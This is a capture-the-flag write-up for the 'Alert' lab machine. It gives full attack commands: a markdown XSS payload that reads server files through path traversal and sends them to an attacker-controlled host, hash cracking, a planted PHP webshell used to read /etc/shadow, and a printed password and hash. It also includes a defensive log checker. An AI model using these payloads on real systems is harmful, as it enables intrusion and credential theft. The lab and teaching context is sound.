Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.44 alert.htb statistics.alert.htb

Script to add hosts automatically

ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV alert.htb
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain

ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20
statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]

Web server (listens on port 8000 for the data sent by the scripts below):

python -m http.server

Markdown XSS:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

URL-decode the response.

The decoded configuration shows /var/www/statistics.alert.htb/.htpasswd, so request that file next:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

URL-decode the response.
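A defender's view of the two requests above, as an added example that is not part of the original writeup: a log check that flags messages.php requests whose file parameter is absolute or climbs out of its directory, including percent-encoded forms. The log lines, client addresses and the benign file name are constructed, and the Apache combined log format is assumed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines (sample data, not from the target).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.20 - - [01/Jan/2025:10:00:05 +0000] "GET /messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 980 "-" "Mozilla/5.0"
192.0.2.20 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=..%2f..%2f..%2fvar%2fwww%2fstatistics.alert.htb%2f.htpasswd HTTP/1.1" 200 57 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2025:10:00:12 +0000] "GET /messages.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2025:10:00:15 +0000] "GET /index.php?page=alert HTTP/1.1" 200 966 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(file_param):
    """True if the decoded value is absolute or contains a '..' path segment."""
    path = fully_decode(file_param).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")


def find_traversal_requests(log_text, script="/messages.php", param="file"):
    """Return (client_ip, decoded_value) for each suspicious request to script.

    parse_qs decodes the query once; fully_decode removes any further layers.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        url = urlsplit(m.group("target")) if m else None
        if url is None or url.path != script:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_traversal(value):
                hits.append((m.group("ip"), fully_decode(value)))
    return hits


if __name__ == "__main__":
    for ip, value in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} requested {value}")
```

The same is_traversal test, applied inside the application before the file is opened, is the corresponding server-side mitigation.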

Brute Force the Hash

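# Read the hash without backslash processing and store it in a temporary file
echo -n "Password Hash? -->" ; read -r hash
echo "$hash" > /tmp/hash.txt
# Mode 1600 is Apache $apr1$ MD5, the format used in .htpasswd
hashcat -m 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 1600 /tmp/hash.txt --show
rm -f /tmp/hash.txt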

This yields the password manchesterunited.

ssh -L 8080:127.0.0.1:8080 albert@alert.htb
cat user.txt
cd /opt/website-monitor/config
echo '<?php system($_GET["cmd"]);?>' > webshell.php

On your machine:

curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'

$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/